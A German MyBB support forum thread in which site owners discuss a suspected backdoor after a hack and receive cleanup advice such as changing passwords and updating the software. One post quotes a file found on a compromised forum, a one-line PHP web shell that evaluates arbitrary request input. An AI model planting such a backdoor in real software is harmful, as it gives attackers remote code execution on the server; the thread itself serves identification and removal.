MyBB.de Forum

MyBB.de Forum > Sonstiges > Internet > [Problem] Backdoor Trojaner.
Normale Version: [Problem] Backdoor Trojaner.
Du siehst gerade eine vereinfachte Darstellung unserer Inhalte. Normale Ansicht mit richtiger Formatierung.
Seiten: 1 2

Devon

02.08.2009, 22:15
Hi,

laut einer unbekannten Quelle, besitze ich auf meinem Forum einen Backdoor Trojaner.

Nun ist meine Frage, wie kann man Diesen entfernen ?

querschlaeger

02.08.2009, 22:20
Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?

Devon

02.08.2009, 22:23
(02.08.2009, 22:20)querschlaeger schrieb: [ -> ]Hi,
da fehlen ein paar Infos. Wer ist die Quelle? Wenn sie unbekannt ist, woher weißt du es dann?

Das Forum laggt extrem und die Quelle meinte, es wäre ein Backdoor Trojaner.
Wenn wir diesen nicht demnächst entfernen würden, wäre das Forum bald offline.

querschlaeger

03.08.2009, 00:20
Hört alles viel zu nebulös an...

Aber wenn du auf Nummer Sicher gehen willst: Ändere alle Passwörter (FTP, SQL, Passwörter der Admins und notfalls noch das Passwort des CP von deinem Provider) - kann nie schaden. Stelle außerdem sicher, dass sich dein MyBB auf der aktuellsten Version befindet bzw. vergleiche die MyBB-Dateien mit denen aus dem offiziellen Paket. Überprüfe auch mal ob die langsame Geschwindigkeit nicht evtl. durch ein Plugin verursacht wird (bei der Gelegenheit auch mal die Plugins auf neuere Versionen prüfene - geht ja einfach im Admin CP).

Ansonsten: Frag deine Quelle mal, wie sie zu so einer Aussage kommt.

frostschutz

03.08.2009, 01:59
Da du von Backdoor sprichst, evtl. das hier: http://community.mybboard.net/thread-52474.html

ankaflojo

09.07.2010, 16:14
Hallo,

ich hole diesen Thread noch einmal hoch,

in dem Link steht

Zitat:Look in your ./cache/themes/ folder, if you see a files called themes.php, please delete it.
Quelle

Ich habe gerade in meinem Forum geschaut (wir wurden gehackt) und ich habe eine solche Datei.
Allerdings nicht in /themes/folder sondern in /themes

gehört die dennoch gelöscht oder ist die dort richtig?

Wahrscheinlich gehört sie dort hin, oder?!
Sie ist vor einem Jahr das letzte mal bearbeitet worden, laut Angaben

Aber mir fehlt dann die /themes/folder die habe ich nicht dort als Unterordner

StefanT

09.07.2010, 16:18
Was steht denn da drin?

ankaflojo

09.07.2010, 16:34
hier das steht drinne:

Code:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>

StefanT

09.07.2010, 16:38
Die Datei muss weg, die ist gefährlich.

ankaflojo

09.07.2010, 16:39
ok, dann werde ich die mal löschen

Danke Smile
um die index-Dateien, also index.php und index.html alle wieder herzustellen, muß ich das alles per hand von einem Backup machen oder kann ich das auch per Upgrade?

Ein Upgrade würde mir dann allerdings wahrscheinlich eine solche Datei, wie eben gelöscht, nicht löschen oder?

wie erkenne ich diese?
Seiten: 1 2
MyBB.de Forum > Sonstiges > Internet > [Problem] Backdoor Trojaner.